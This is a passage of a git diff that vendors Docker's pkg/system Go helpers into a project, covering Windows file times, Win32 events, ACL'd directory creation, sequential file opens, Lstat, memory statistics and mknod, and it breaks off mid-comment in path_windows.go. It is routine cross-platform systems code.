+func setCTime(path string, ctime time.Time) error { + ctimespec := syscall.NsecToTimespec(ctime.UnixNano()) + pathp, e := syscall.UTF16PtrFromString(path) + if e != nil { + return e + } + h, e := syscall.CreateFile(pathp, + syscall.FILE_WRITE_ATTRIBUTES, syscall.FILE_SHARE_WRITE, nil, + syscall.OPEN_EXISTING, syscall.FILE_FLAG_BACKUP_SEMANTICS, 0) + if e != nil { + return e + } + defer syscall.Close(h) + c := syscall.NsecToFiletime(syscall.TimespecToNsec(ctimespec)) + return syscall.SetFileTime(h, &c, nil, nil) +} diff --git a/vendor/github.com/docker/docker/pkg/system/chtimes_windows_test.go b/vendor/github.com/docker/docker/pkg/system/chtimes_windows_test.go new file mode 100644 index 0000000000..72d8a10619 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/chtimes_windows_test.go @@ -0,0 +1,86 @@ +// +build windows + +package system + +import ( + "os" + "syscall" + "testing" + "time" +) + +// TestChtimesWindows tests Chtimes access time on a tempfile on Windows +func TestChtimesWindows(t *testing.T) { + file, dir := prepareTempFile(t) + defer os.RemoveAll(dir) + + beforeUnixEpochTime := time.Unix(0, 0).Add(-100 * time.Second) + unixEpochTime := time.Unix(0, 0) + afterUnixEpochTime := time.Unix(100, 0) + unixMaxTime := maxTime + + // Test both aTime and mTime set to Unix Epoch + Chtimes(file, unixEpochTime, unixEpochTime) + + f, err := os.Stat(file) + if err != nil { + t.Fatal(err) + } + + aTime := time.Unix(0, f.Sys().(*syscall.Win32FileAttributeData).LastAccessTime.Nanoseconds()) + if aTime != unixEpochTime { + t.Fatalf("Expected: %s, got: %s", unixEpochTime, aTime) + } + + // Test aTime before Unix Epoch and mTime set to Unix Epoch + Chtimes(file, beforeUnixEpochTime, unixEpochTime) + + f, err = os.Stat(file) + if err != nil { + t.Fatal(err) + } + + aTime = time.Unix(0, f.Sys().(*syscall.Win32FileAttributeData).LastAccessTime.Nanoseconds()) + if aTime != unixEpochTime { + t.Fatalf("Expected: %s, got: %s", unixEpochTime, aTime) + } + + // Test 
aTime set to Unix Epoch and mTime before Unix Epoch + Chtimes(file, unixEpochTime, beforeUnixEpochTime) + + f, err = os.Stat(file) + if err != nil { + t.Fatal(err) + } + + aTime = time.Unix(0, f.Sys().(*syscall.Win32FileAttributeData).LastAccessTime.Nanoseconds()) + if aTime != unixEpochTime { + t.Fatalf("Expected: %s, got: %s", unixEpochTime, aTime) + } + + // Test both aTime and mTime set to after Unix Epoch (valid time) + Chtimes(file, afterUnixEpochTime, afterUnixEpochTime) + + f, err = os.Stat(file) + if err != nil { + t.Fatal(err) + } + + aTime = time.Unix(0, f.Sys().(*syscall.Win32FileAttributeData).LastAccessTime.Nanoseconds()) + if aTime != afterUnixEpochTime { + t.Fatalf("Expected: %s, got: %s", afterUnixEpochTime, aTime) + } + + // Test both aTime and mTime set to Unix max time + Chtimes(file, unixMaxTime, unixMaxTime) + + f, err = os.Stat(file) + if err != nil { + t.Fatal(err) + } + + aTime = time.Unix(0, f.Sys().(*syscall.Win32FileAttributeData).LastAccessTime.Nanoseconds()) + if aTime.Truncate(time.Second) != unixMaxTime.Truncate(time.Second) { + t.Fatalf("Expected: %s, got: %s", unixMaxTime.Truncate(time.Second), aTime.Truncate(time.Second)) + } +} diff --git a/vendor/github.com/docker/docker/pkg/system/errors.go b/vendor/github.com/docker/docker/pkg/system/errors.go new file mode 100644 index 0000000000..288318985e --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/errors.go @@ -0,0 +1,10 @@ +package system + +import ( + "errors" +) + +var ( + // ErrNotSupportedPlatform means the platform is not supported. 
+ ErrNotSupportedPlatform = errors.New("platform and architecture is not supported") +) diff --git a/vendor/github.com/docker/docker/pkg/system/events_windows.go b/vendor/github.com/docker/docker/pkg/system/events_windows.go new file mode 100644 index 0000000000..3ec6d22151 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/events_windows.go @@ -0,0 +1,85 @@ +package system + +// This file implements syscalls for Win32 events which are not implemented +// in golang. + +import ( + "syscall" + "unsafe" + + "golang.org/x/sys/windows" +) + +var ( + procCreateEvent = modkernel32.NewProc("CreateEventW") + procOpenEvent = modkernel32.NewProc("OpenEventW") + procSetEvent = modkernel32.NewProc("SetEvent") + procResetEvent = modkernel32.NewProc("ResetEvent") + procPulseEvent = modkernel32.NewProc("PulseEvent") +) + +// CreateEvent implements win32 CreateEventW func in golang. It will create an event object. +func CreateEvent(eventAttributes *syscall.SecurityAttributes, manualReset bool, initialState bool, name string) (handle syscall.Handle, err error) { + namep, _ := syscall.UTF16PtrFromString(name) + var _p1 uint32 + if manualReset { + _p1 = 1 + } + var _p2 uint32 + if initialState { + _p2 = 1 + } + r0, _, e1 := procCreateEvent.Call(uintptr(unsafe.Pointer(eventAttributes)), uintptr(_p1), uintptr(_p2), uintptr(unsafe.Pointer(namep))) + use(unsafe.Pointer(namep)) + handle = syscall.Handle(r0) + if handle == syscall.InvalidHandle { + err = e1 + } + return +} + +// OpenEvent implements win32 OpenEventW func in golang. It opens an event object. 
+func OpenEvent(desiredAccess uint32, inheritHandle bool, name string) (handle syscall.Handle, err error) { + namep, _ := syscall.UTF16PtrFromString(name) + var _p1 uint32 + if inheritHandle { + _p1 = 1 + } + r0, _, e1 := procOpenEvent.Call(uintptr(desiredAccess), uintptr(_p1), uintptr(unsafe.Pointer(namep))) + use(unsafe.Pointer(namep)) + handle = syscall.Handle(r0) + if handle == syscall.InvalidHandle { + err = e1 + } + return +} + +// SetEvent implements win32 SetEvent func in golang. +func SetEvent(handle syscall.Handle) (err error) { + return setResetPulse(handle, procSetEvent) +} + +// ResetEvent implements win32 ResetEvent func in golang. +func ResetEvent(handle syscall.Handle) (err error) { + return setResetPulse(handle, procResetEvent) +} + +// PulseEvent implements win32 PulseEvent func in golang. +func PulseEvent(handle syscall.Handle) (err error) { + return setResetPulse(handle, procPulseEvent) +} + +func setResetPulse(handle syscall.Handle, proc *windows.LazyProc) (err error) { + r0, _, _ := proc.Call(uintptr(handle)) + if r0 != 0 { + err = syscall.Errno(r0) + } + return +} + +var temp unsafe.Pointer + +// use ensures a variable is kept alive without the GC freeing while still needed +func use(p unsafe.Pointer) { + temp = p +} diff --git a/vendor/github.com/docker/docker/pkg/system/exitcode.go b/vendor/github.com/docker/docker/pkg/system/exitcode.go new file mode 100644 index 0000000000..60f0514b1d --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/exitcode.go @@ -0,0 +1,33 @@ +package system + +import ( + "fmt" + "os/exec" + "syscall" +) + +// GetExitCode returns the ExitStatus of the specified error if its type is +// exec.ExitError, returns 0 and an error otherwise. 
+func GetExitCode(err error) (int, error) { + exitCode := 0 + if exiterr, ok := err.(*exec.ExitError); ok { + if procExit, ok := exiterr.Sys().(syscall.WaitStatus); ok { + return procExit.ExitStatus(), nil + } + } + return exitCode, fmt.Errorf("failed to get exit code") +} + +// ProcessExitCode process the specified error and returns the exit status code +// if the error was of type exec.ExitError, returns nothing otherwise. +func ProcessExitCode(err error) (exitCode int) { + if err != nil { + var exiterr error + if exitCode, exiterr = GetExitCode(err); exiterr != nil { + // TODO: Fix this so we check the error's text. + // we've failed to retrieve exit code, so we set it to 127 + exitCode = 127 + } + } + return +} diff --git a/vendor/github.com/docker/docker/pkg/system/filesys.go b/vendor/github.com/docker/docker/pkg/system/filesys.go new file mode 100644 index 0000000000..810c794786 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/filesys.go @@ -0,0 +1,54 @@ +// +build !windows + +package system + +import ( + "os" + "path/filepath" +) + +// MkdirAllWithACL is a wrapper for MkdirAll that creates a directory +// ACL'd for Builtin Administrators and Local System. +func MkdirAllWithACL(path string, perm os.FileMode) error { + return MkdirAll(path, perm) +} + +// MkdirAll creates a directory named path along with any necessary parents, +// with permission specified by attribute perm for all dir created. +func MkdirAll(path string, perm os.FileMode) error { + return os.MkdirAll(path, perm) +} + +// IsAbs is a platform-specific wrapper for filepath.IsAbs. +func IsAbs(path string) bool { + return filepath.IsAbs(path) +} + +// The functions below here are wrappers for the equivalents in the os package. +// They are passthrough on Unix platforms, and only relevant on Windows. + +// CreateSequential creates the named file with mode 0666 (before umask), truncating +// it if it already exists. 
If successful, methods on the returned +// File can be used for I/O; the associated file descriptor has mode +// O_RDWR. +// If there is an error, it will be of type *PathError. +func CreateSequential(name string) (*os.File, error) { + return os.Create(name) +} + +// OpenSequential opens the named file for reading. If successful, methods on +// the returned file can be used for reading; the associated file +// descriptor has mode O_RDONLY. +// If there is an error, it will be of type *PathError. +func OpenSequential(name string) (*os.File, error) { + return os.Open(name) +} + +// OpenFileSequential is the generalized open call; most users will use Open +// or Create instead. It opens the named file with specified flag +// (O_RDONLY etc.) and perm, (0666 etc.) if applicable. If successful, +// methods on the returned File can be used for I/O. +// If there is an error, it will be of type *PathError. +func OpenFileSequential(name string, flag int, perm os.FileMode) (*os.File, error) { + return os.OpenFile(name, flag, perm) +} diff --git a/vendor/github.com/docker/docker/pkg/system/filesys_windows.go b/vendor/github.com/docker/docker/pkg/system/filesys_windows.go new file mode 100644 index 0000000000..6094f01fd4 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/filesys_windows.go @@ -0,0 +1,236 @@ +// +build windows + +package system + +import ( + "os" + "path/filepath" + "regexp" + "strings" + "syscall" + "unsafe" + + winio "github.com/Microsoft/go-winio" +) + +// MkdirAllWithACL is a wrapper for MkdirAll that creates a directory +// ACL'd for Builtin Administrators and Local System. +func MkdirAllWithACL(path string, perm os.FileMode) error { + return mkdirall(path, true) +} + +// MkdirAll implementation that is volume path aware for Windows. 
+func MkdirAll(path string, _ os.FileMode) error { + return mkdirall(path, false) +} + +// mkdirall is a custom version of os.MkdirAll modified for use on Windows +// so that it is both volume path aware, and can create a directory with +// a DACL. +func mkdirall(path string, adminAndLocalSystem bool) error { + if re := regexp.MustCompile(`^\\\\\?\\Volume{[a-z0-9-]+}$`); re.MatchString(path) { + return nil + } + + // The rest of this method is largely copied from os.MkdirAll and should be kept + // as-is to ensure compatibility. + + // Fast path: if we can tell whether path is a directory or file, stop with success or error. + dir, err := os.Stat(path) + if err == nil { + if dir.IsDir() { + return nil + } + return &os.PathError{ + Op: "mkdir", + Path: path, + Err: syscall.ENOTDIR, + } + } + + // Slow path: make sure parent exists and then call Mkdir for path. + i := len(path) + for i > 0 && os.IsPathSeparator(path[i-1]) { // Skip trailing path separator. + i-- + } + + j := i + for j > 0 && !os.IsPathSeparator(path[j-1]) { // Scan backward over element. + j-- + } + + if j > 1 { + // Create parent + err = mkdirall(path[0:j-1], false) + if err != nil { + return err + } + } + + // Parent now exists; invoke os.Mkdir or mkdirWithACL and use its result. + if adminAndLocalSystem { + err = mkdirWithACL(path) + } else { + err = os.Mkdir(path, 0) + } + + if err != nil { + // Handle arguments like "foo/." by + // double-checking that directory doesn't exist. + dir, err1 := os.Lstat(path) + if err1 == nil && dir.IsDir() { + return nil + } + return err + } + return nil +} + +// mkdirWithACL creates a new directory. If there is an error, it will be of +// type *PathError. . +// +// This is a modified and combined version of os.Mkdir and syscall.Mkdir +// in golang to cater for creating a directory am ACL permitting full +// access, with inheritance, to any subfolder/file for Built-in Administrators +// and Local System. 
+func mkdirWithACL(name string) error { + sa := syscall.SecurityAttributes{Length: 0} + sddl := "D:P(A;OICI;GA;;;BA)(A;OICI;GA;;;SY)" + sd, err := winio.SddlToSecurityDescriptor(sddl) + if err != nil { + return &os.PathError{Op: "mkdir", Path: name, Err: err} + } + sa.Length = uint32(unsafe.Sizeof(sa)) + sa.InheritHandle = 1 + sa.SecurityDescriptor = uintptr(unsafe.Pointer(&sd[0])) + + namep, err := syscall.UTF16PtrFromString(name) + if err != nil { + return &os.PathError{Op: "mkdir", Path: name, Err: err} + } + + e := syscall.CreateDirectory(namep, &sa) + if e != nil { + return &os.PathError{Op: "mkdir", Path: name, Err: e} + } + return nil +} + +// IsAbs is a platform-specific wrapper for filepath.IsAbs. On Windows, +// golang filepath.IsAbs does not consider a path \windows\system32 as absolute +// as it doesn't start with a drive-letter/colon combination. However, in +// docker we need to verify things such as WORKDIR /windows/system32 in +// a Dockerfile (which gets translated to \windows\system32 when being processed +// by the daemon. This SHOULD be treated as absolute from a docker processing +// perspective. +func IsAbs(path string) bool { + if !filepath.IsAbs(path) { + if !strings.HasPrefix(path, string(os.PathSeparator)) { + return false + } + } + return true +} + +// The origin of the functions below here are the golang OS and syscall packages, +// slightly modified to only cope with files, not directories due to the +// specific use case. +// +// The alteration is to allow a file on Windows to be opened with +// FILE_FLAG_SEQUENTIAL_SCAN (particular for docker load), to avoid eating +// the standby list, particularly when accessing large files such as layer.tar. + +// CreateSequential creates the named file with mode 0666 (before umask), truncating +// it if it already exists. If successful, methods on the returned +// File can be used for I/O; the associated file descriptor has mode +// O_RDWR. +// If there is an error, it will be of type *PathError. 
+func CreateSequential(name string) (*os.File, error) { + return OpenFileSequential(name, os.O_RDWR|os.O_CREATE|os.O_TRUNC, 0) +} + +// OpenSequential opens the named file for reading. If successful, methods on +// the returned file can be used for reading; the associated file +// descriptor has mode O_RDONLY. +// If there is an error, it will be of type *PathError. +func OpenSequential(name string) (*os.File, error) { + return OpenFileSequential(name, os.O_RDONLY, 0) +} + +// OpenFileSequential is the generalized open call; most users will use Open +// or Create instead. +// If there is an error, it will be of type *PathError. +func OpenFileSequential(name string, flag int, _ os.FileMode) (*os.File, error) { + if name == "" { + return nil, &os.PathError{Op: "open", Path: name, Err: syscall.ENOENT} + } + r, errf := syscallOpenFileSequential(name, flag, 0) + if errf == nil { + return r, nil + } + return nil, &os.PathError{Op: "open", Path: name, Err: errf} +} + +func syscallOpenFileSequential(name string, flag int, _ os.FileMode) (file *os.File, err error) { + r, e := syscallOpenSequential(name, flag|syscall.O_CLOEXEC, 0) + if e != nil { + return nil, e + } + return os.NewFile(uintptr(r), name), nil +} + +func makeInheritSa() *syscall.SecurityAttributes { + var sa syscall.SecurityAttributes + sa.Length = uint32(unsafe.Sizeof(sa)) + sa.InheritHandle = 1 + return &sa +} + +func syscallOpenSequential(path string, mode int, _ uint32) (fd syscall.Handle, err error) { + if len(path) == 0 { + return syscall.InvalidHandle, syscall.ERROR_FILE_NOT_FOUND + } + pathp, err := syscall.UTF16PtrFromString(path) + if err != nil { + return syscall.InvalidHandle, err + } + var access uint32 + switch mode & (syscall.O_RDONLY | syscall.O_WRONLY | syscall.O_RDWR) { + case syscall.O_RDONLY: + access = syscall.GENERIC_READ + case syscall.O_WRONLY: + access = syscall.GENERIC_WRITE + case syscall.O_RDWR: + access = syscall.GENERIC_READ | syscall.GENERIC_WRITE + } + if mode&syscall.O_CREAT != 
0 { + access |= syscall.GENERIC_WRITE + } + if mode&syscall.O_APPEND != 0 { + access &^= syscall.GENERIC_WRITE + access |= syscall.FILE_APPEND_DATA + } + sharemode := uint32(syscall.FILE_SHARE_READ | syscall.FILE_SHARE_WRITE) + var sa *syscall.SecurityAttributes + if mode&syscall.O_CLOEXEC == 0 { + sa = makeInheritSa() + } + var createmode uint32 + switch { + case mode&(syscall.O_CREAT|syscall.O_EXCL) == (syscall.O_CREAT | syscall.O_EXCL): + createmode = syscall.CREATE_NEW + case mode&(syscall.O_CREAT|syscall.O_TRUNC) == (syscall.O_CREAT | syscall.O_TRUNC): + createmode = syscall.CREATE_ALWAYS + case mode&syscall.O_CREAT == syscall.O_CREAT: + createmode = syscall.OPEN_ALWAYS + case mode&syscall.O_TRUNC == syscall.O_TRUNC: + createmode = syscall.TRUNCATE_EXISTING + default: + createmode = syscall.OPEN_EXISTING + } + // Use FILE_FLAG_SEQUENTIAL_SCAN rather than FILE_ATTRIBUTE_NORMAL as implemented in golang. + //https://msdn.microsoft.com/en-us/library/windows/desktop/aa363858(v=vs.85).aspx + const fileFlagSequentialScan = 0x08000000 // FILE_FLAG_SEQUENTIAL_SCAN + h, e := syscall.CreateFile(pathp, access, sharemode, sa, createmode, fileFlagSequentialScan, 0) + return h, e +} diff --git a/vendor/github.com/docker/docker/pkg/system/lstat.go b/vendor/github.com/docker/docker/pkg/system/lstat.go new file mode 100644 index 0000000000..bd23c4d50b --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/lstat.go @@ -0,0 +1,19 @@ +// +build !windows + +package system + +import ( + "syscall" +) + +// Lstat takes a path to a file and returns +// a system.StatT type pertaining to that file. 
+// +// Throws an error if the file does not exist +func Lstat(path string) (*StatT, error) { + s := &syscall.Stat_t{} + if err := syscall.Lstat(path, s); err != nil { + return nil, err + } + return fromStatT(s) +} diff --git a/vendor/github.com/docker/docker/pkg/system/lstat_unix_test.go b/vendor/github.com/docker/docker/pkg/system/lstat_unix_test.go new file mode 100644 index 0000000000..062cf53bfe --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/lstat_unix_test.go @@ -0,0 +1,30 @@ +// +build linux freebsd + +package system + +import ( + "os" + "testing" +) + +// TestLstat tests Lstat for existing and non existing files +func TestLstat(t *testing.T) { + file, invalid, _, dir := prepareFiles(t) + defer os.RemoveAll(dir) + + statFile, err := Lstat(file) + if err != nil { + t.Fatal(err) + } + if statFile == nil { + t.Fatal("returned empty stat for existing file") + } + + statInvalid, err := Lstat(invalid) + if err == nil { + t.Fatal("did not return error for non-existing file") + } + if statInvalid != nil { + t.Fatal("returned non-nil stat for non-existing file") + } +} diff --git a/vendor/github.com/docker/docker/pkg/system/lstat_windows.go b/vendor/github.com/docker/docker/pkg/system/lstat_windows.go new file mode 100644 index 0000000000..49e87eb40b --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/lstat_windows.go @@ -0,0 +1,25 @@ +// +build windows + +package system + +import ( + "os" +) + +// Lstat calls os.Lstat to get a fileinfo interface back. +// This is then copied into our own locally defined structure. +// Note the Linux version uses fromStatT to do the copy back, +// but that not strictly necessary when already in an OS specific module. 
+func Lstat(path string) (*StatT, error) { + fi, err := os.Lstat(path) + if err != nil { + return nil, err + } + + return &StatT{ + name: fi.Name(), + size: fi.Size(), + mode: fi.Mode(), + modTime: fi.ModTime(), + isDir: fi.IsDir()}, nil +} diff --git a/vendor/github.com/docker/docker/pkg/system/meminfo.go b/vendor/github.com/docker/docker/pkg/system/meminfo.go new file mode 100644 index 0000000000..3b6e947e67 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/meminfo.go @@ -0,0 +1,17 @@ +package system + +// MemInfo contains memory statistics of the host system. +type MemInfo struct { + // Total usable RAM (i.e. physical RAM minus a few reserved bits and the + // kernel binary code). + MemTotal int64 + + // Amount of free memory. + MemFree int64 + + // Total amount of swap space available. + SwapTotal int64 + + // Amount of swap space that is currently unused. + SwapFree int64 +} diff --git a/vendor/github.com/docker/docker/pkg/system/meminfo_linux.go b/vendor/github.com/docker/docker/pkg/system/meminfo_linux.go new file mode 100644 index 0000000000..385f1d5e73 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/meminfo_linux.go @@ -0,0 +1,65 @@ +package system + +import ( + "bufio" + "io" + "os" + "strconv" + "strings" + + "github.com/docker/go-units" +) + +// ReadMemInfo retrieves memory statistics of the host system and returns a +// MemInfo type. +func ReadMemInfo() (*MemInfo, error) { + file, err := os.Open("/proc/meminfo") + if err != nil { + return nil, err + } + defer file.Close() + return parseMemInfo(file) +} + +// parseMemInfo parses the /proc/meminfo file into +// a MemInfo object given an io.Reader to the file. 
+// Throws error if there are problems reading from the file +func parseMemInfo(reader io.Reader) (*MemInfo, error) { + meminfo := &MemInfo{} + scanner := bufio.NewScanner(reader) + for scanner.Scan() { + // Expected format: ["MemTotal:", "1234", "kB"] + parts := strings.Fields(scanner.Text()) + + // Sanity checks: Skip malformed entries. + if len(parts) < 3 || parts[2] != "kB" { + continue + } + + // Convert to bytes. + size, err := strconv.Atoi(parts[1]) + if err != nil { + continue + } + bytes := int64(size) * units.KiB + + switch parts[0] { + case "MemTotal:": + meminfo.MemTotal = bytes + case "MemFree:": + meminfo.MemFree = bytes + case "SwapTotal:": + meminfo.SwapTotal = bytes + case "SwapFree:": + meminfo.SwapFree = bytes + } + + } + + // Handle errors that may have occurred during the reading of the file. + if err := scanner.Err(); err != nil { + return nil, err + } + + return meminfo, nil +} diff --git a/vendor/github.com/docker/docker/pkg/system/meminfo_solaris.go b/vendor/github.com/docker/docker/pkg/system/meminfo_solaris.go new file mode 100644 index 0000000000..7f4f84f73a --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/meminfo_solaris.go @@ -0,0 +1,128 @@ +// +build solaris,cgo + +package system + +import ( + "fmt" + "unsafe" +) + +// #cgo LDFLAGS: -lkstat +// #include +// #include +// #include +// #include +// #include +// #include +// struct swaptable *allocSwaptable(int num) { +// struct swaptable *st; +// struct swapent *swapent; +// st = (struct swaptable *)malloc(num * sizeof(swapent_t) + sizeof (int)); +// swapent = st->swt_ent; +// for (int i = 0; i < num; i++,swapent++) { +// swapent->ste_path = (char *)malloc(MAXPATHLEN * sizeof (char)); +// } +// st->swt_n = num; +// return st; +//} +// void freeSwaptable (struct swaptable *st) { +// struct swapent *swapent = st->swt_ent; +// for (int i = 0; i < st->swt_n; i++,swapent++) { +// free(swapent->ste_path); +// } +// free(st); +// } +// swapent_t getSwapEnt(swapent_t *ent, int i) { 
+// return ent[i]; +// } +// int64_t getPpKernel() { +// int64_t pp_kernel = 0; +// kstat_ctl_t *ksc; +// kstat_t *ks; +// kstat_named_t *knp; +// kid_t kid; +// +// if ((ksc = kstat_open()) == NULL) { +// return -1; +// } +// if ((ks = kstat_lookup(ksc, "unix", 0, "system_pages")) == NULL) { +// return -1; +// } +// if (((kid = kstat_read(ksc, ks, NULL)) == -1) || +// ((knp = kstat_data_lookup(ks, "pp_kernel")) == NULL)) { +// return -1; +// } +// switch (knp->data_type) { +// case KSTAT_DATA_UINT64: +// pp_kernel = knp->value.ui64; +// break; +// case KSTAT_DATA_UINT32: +// pp_kernel = knp->value.ui32; +// break; +// } +// pp_kernel *= sysconf(_SC_PAGESIZE); +// return (pp_kernel > 0 ? pp_kernel : -1); +// } +import "C" + +// Get the system memory info using sysconf same as prtconf +func getTotalMem() int64 { + pagesize := C.sysconf(C._SC_PAGESIZE) + npages := C.sysconf(C._SC_PHYS_PAGES) + return int64(pagesize * npages) +} + +func getFreeMem() int64 { + pagesize := C.sysconf(C._SC_PAGESIZE) + npages := C.sysconf(C._SC_AVPHYS_PAGES) + return int64(pagesize * npages) +} + +// ReadMemInfo retrieves memory statistics of the host system and returns a +// MemInfo type. 
+func ReadMemInfo() (*MemInfo, error) { + + ppKernel := C.getPpKernel() + MemTotal := getTotalMem() + MemFree := getFreeMem() + SwapTotal, SwapFree, err := getSysSwap() + + if ppKernel < 0 || MemTotal < 0 || MemFree < 0 || SwapTotal < 0 || + SwapFree < 0 { + return nil, fmt.Errorf("error getting system memory info %v\n", err) + } + + meminfo := &MemInfo{} + // Total memory is total physical memory less than memory locked by kernel + meminfo.MemTotal = MemTotal - int64(ppKernel) + meminfo.MemFree = MemFree + meminfo.SwapTotal = SwapTotal + meminfo.SwapFree = SwapFree + + return meminfo, nil +} + +func getSysSwap() (int64, int64, error) { + var tSwap int64 + var fSwap int64 + var diskblksPerPage int64 + num, err := C.swapctl(C.SC_GETNSWP, nil) + if err != nil { + return -1, -1, err + } + st := C.allocSwaptable(num) + _, err = C.swapctl(C.SC_LIST, unsafe.Pointer(st)) + if err != nil { + C.freeSwaptable(st) + return -1, -1, err + } + + diskblksPerPage = int64(C.sysconf(C._SC_PAGESIZE) >> C.DEV_BSHIFT) + for i := 0; i < int(num); i++ { + swapent := C.getSwapEnt(&st.swt_ent[0], C.int(i)) + tSwap += int64(swapent.ste_pages) * diskblksPerPage + fSwap += int64(swapent.ste_free) * diskblksPerPage + } + C.freeSwaptable(st) + return tSwap, fSwap, nil +} diff --git a/vendor/github.com/docker/docker/pkg/system/meminfo_unix_test.go b/vendor/github.com/docker/docker/pkg/system/meminfo_unix_test.go new file mode 100644 index 0000000000..44f5562882 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/meminfo_unix_test.go @@ -0,0 +1,40 @@ +// +build linux freebsd + +package system + +import ( + "strings" + "testing" + + "github.com/docker/go-units" +) + +// TestMemInfo tests parseMemInfo with a static meminfo string +func TestMemInfo(t *testing.T) { + const input = ` + MemTotal: 1 kB + MemFree: 2 kB + SwapTotal: 3 kB + SwapFree: 4 kB + Malformed1: + Malformed2: 1 + Malformed3: 2 MB + Malformed4: X kB + ` + meminfo, err := parseMemInfo(strings.NewReader(input)) + if err != 
nil { + t.Fatal(err) + } + if meminfo.MemTotal != 1*units.KiB { + t.Fatalf("Unexpected MemTotal: %d", meminfo.MemTotal) + } + if meminfo.MemFree != 2*units.KiB { + t.Fatalf("Unexpected MemFree: %d", meminfo.MemFree) + } + if meminfo.SwapTotal != 3*units.KiB { + t.Fatalf("Unexpected SwapTotal: %d", meminfo.SwapTotal) + } + if meminfo.SwapFree != 4*units.KiB { + t.Fatalf("Unexpected SwapFree: %d", meminfo.SwapFree) + } +} diff --git a/vendor/github.com/docker/docker/pkg/system/meminfo_unsupported.go b/vendor/github.com/docker/docker/pkg/system/meminfo_unsupported.go new file mode 100644 index 0000000000..3ce019dffd --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/meminfo_unsupported.go @@ -0,0 +1,8 @@ +// +build !linux,!windows,!solaris + +package system + +// ReadMemInfo is not supported on platforms other than linux and windows. +func ReadMemInfo() (*MemInfo, error) { + return nil, ErrNotSupportedPlatform +} diff --git a/vendor/github.com/docker/docker/pkg/system/meminfo_windows.go b/vendor/github.com/docker/docker/pkg/system/meminfo_windows.go new file mode 100644 index 0000000000..883944a4c5 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/meminfo_windows.go @@ -0,0 +1,45 @@ +package system + +import ( + "unsafe" + + "golang.org/x/sys/windows" +) + +var ( + modkernel32 = windows.NewLazySystemDLL("kernel32.dll") + + procGlobalMemoryStatusEx = modkernel32.NewProc("GlobalMemoryStatusEx") +) + +// https://msdn.microsoft.com/en-us/library/windows/desktop/aa366589(v=vs.85).aspx +// https://msdn.microsoft.com/en-us/library/windows/desktop/aa366770(v=vs.85).aspx +type memorystatusex struct { + dwLength uint32 + dwMemoryLoad uint32 + ullTotalPhys uint64 + ullAvailPhys uint64 + ullTotalPageFile uint64 + ullAvailPageFile uint64 + ullTotalVirtual uint64 + ullAvailVirtual uint64 + ullAvailExtendedVirtual uint64 +} + +// ReadMemInfo retrieves memory statistics of the host system and returns a +// MemInfo type. 
+func ReadMemInfo() (*MemInfo, error) { + msi := &memorystatusex{ + dwLength: 64, + } + r1, _, _ := procGlobalMemoryStatusEx.Call(uintptr(unsafe.Pointer(msi))) + if r1 == 0 { + return &MemInfo{}, nil + } + return &MemInfo{ + MemTotal: int64(msi.ullTotalPhys), + MemFree: int64(msi.ullAvailPhys), + SwapTotal: int64(msi.ullTotalPageFile), + SwapFree: int64(msi.ullAvailPageFile), + }, nil +} diff --git a/vendor/github.com/docker/docker/pkg/system/mknod.go b/vendor/github.com/docker/docker/pkg/system/mknod.go new file mode 100644 index 0000000000..73958182b4 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/mknod.go @@ -0,0 +1,22 @@ +// +build !windows + +package system + +import ( + "syscall" +) + +// Mknod creates a filesystem node (file, device special file or named pipe) named path +// with attributes specified by mode and dev. +func Mknod(path string, mode uint32, dev int) error { + return syscall.Mknod(path, mode, dev) +} + +// Mkdev is used to build the value of linux devices (in /dev/) which specifies major +// and minor number of the newly created device special file. +// Linux device nodes are a bit weird due to backwards compat with 16 bit device nodes. +// They are, from low to high: the lower 8 bits of the minor, then 12 bits of the major, +// then the top 12 bits of the minor. +func Mkdev(major int64, minor int64) uint32 { + return uint32(((minor & 0xfff00) << 12) | ((major & 0xfff) << 8) | (minor & 0xff)) +} diff --git a/vendor/github.com/docker/docker/pkg/system/mknod_windows.go b/vendor/github.com/docker/docker/pkg/system/mknod_windows.go new file mode 100644 index 0000000000..2e863c0215 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/mknod_windows.go @@ -0,0 +1,13 @@ +// +build windows + +package system + +// Mknod is not implemented on Windows. +func Mknod(path string, mode uint32, dev int) error { + return ErrNotSupportedPlatform +} + +// Mkdev is not implemented on Windows. 
+func Mkdev(major int64, minor int64) uint32 { + panic("Mkdev not implemented on Windows.") +} diff --git a/vendor/github.com/docker/docker/pkg/system/path_unix.go b/vendor/github.com/docker/docker/pkg/system/path_unix.go new file mode 100644 index 0000000000..c607c4db09 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/path_unix.go @@ -0,0 +1,14 @@ +// +build !windows + +package system + +// DefaultPathEnv is unix style list of directories to search for +// executables. Each directory is separated from the next by a colon +// ':' character . +const DefaultPathEnv = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" + +// CheckSystemDriveAndRemoveDriveLetter verifies that a path, if it includes a drive letter, +// is the system drive. This is a no-op on Linux. +func CheckSystemDriveAndRemoveDriveLetter(path string) (string, error) { + return path, nil +} diff --git a/vendor/github.com/docker/docker/pkg/system/path_windows.go b/vendor/github.com/docker/docker/pkg/system/path_windows.go new file mode 100644 index 0000000000..cbfe2c1576 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/path_windows.go @@ -0,0 +1,37 @@ +// +build windows + +package system + +import ( + "fmt" + "path/filepath" + "strings" +) + +// DefaultPathEnv is deliberately empty on Windows as the default path will be set by +// the container. Docker has no context of what the default path should be. +const DefaultPathEnv = "" + +// CheckSystemDriveAndRemoveDriveLetter verifies and manipulates a Windows path. +// This is used, for example, when validating a user provided path in docker cp. +// If a drive letter is supplied, it must be the system drive. The drive letter +// is always removed. Also, it translates it to 